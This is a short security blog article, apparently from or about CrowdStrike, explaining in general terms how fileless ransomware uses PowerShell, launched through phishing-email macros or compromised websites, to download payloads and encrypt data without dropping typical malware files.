How Ransomware Uses Powershell

Fileless Attacks: The Evolution of Ransomware

Ransomware continues to produce significant revenue for hackers as consumers and companies move toward complete digital storage — if access to personal documents or key corporate information is suddenly and completely restricted, it’s no surprise victims are willing to pay rather than risk complete data destruction. While hackers typically charge individuals between $300 and $500 — usually payable in bitcoin — for the return of their files, companies are often hit with ransoms of 50 to 100 times this amount, making ransomware a lucrative proposition for cybercriminals.

However, malicious actors aren’t content with current attack vectors. 2016 saw a marked rise in the use of “fileless ransomware,” which doesn’t follow the traditional pattern of downloading new data onto a target machine but rather leveraging device-native processes, such as Powershell, to execute attacks.

Upping the Ante

Current ransomware methods can mean big money for attackers, but this malware class wasn’t always so successful. Original iterations focused on locking users out of their devices altogether, but these methods were largely hit-or-miss. As IT security advanced, so too did malware makers, spreading source code online and sharing data to create new attack vectors that appeared to be legitimate files, necessary updates or even trusted emails. Once installed on victim computers, these ransomware payloads leveraged complex encryption to prevent user access to specific files, then often initiated a countdown for payment — after which all files would be destroyed.

In recent years, the ransomware market has grown so rapidly that corporate-like structures have emerged complete with “customer service” for entry-level hackers trying malware deployment kits and good-faith file recovery to prove that attackers are both in possession of encryption keys and willing to release data upon payment.

The Powershell Problem

To stay ahead of new IT security techniques such as sandboxing, IP address whitelisting and automated detection, hackers have developed a new class of “fileless” ransomware that doesn’t drop malware downloaders onto devices — since these processes often come with common indicators of attack (IOA) — but instead leverage existing in-memory processes to start the ransomware download process.

Currently, two vectors (phishing emails and compromised websites) are common, but both starting points lead to the same conclusion — Powershell. Compromised email attachments leverage macros to start a command line and then run Poweshell, while compromised sites use exploited apps to do the same. With access to Powershell, ransomware processes can initiate downloads, which in turn encrypt user data, all without the need for “typical” malware files.

Ransomware is changing. Traditional payloads are falling out of favor; Powershell is the new face of fileless attacks.

How Ransomware Uses Powershell

How Ransomware Uses Powershell from CrowdStrike

Leave a Comment